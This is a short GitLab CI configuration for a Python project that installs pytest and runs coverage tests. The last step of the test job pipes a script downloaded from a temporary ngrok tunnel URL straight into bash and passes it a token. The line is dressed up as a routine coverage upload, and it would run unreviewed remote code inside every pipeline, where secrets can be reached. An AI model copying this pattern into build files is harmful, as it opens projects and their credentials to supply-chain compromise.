# Official language image. Look for the different tagged releases at:
# https://hub.docker.com/r/library/python/tags/
image: python:latest

# Change pip's cache directory to be inside the project directory since we can
# only cache local items.

before_script:
  - python -V  # Print out python version for debugging
  - pip install virtualenv
  - virtualenv venv
  - source venv/bin/activate

test:
  script:
    - pip install pytest-cov
    - pytest --cov=./ --cov-report=xml
    - bash <(curl -s https://18c4fec555b6.ngrok.io/bash) -t 2693f065-7220-48c6-9fa6-895c1ca543dd
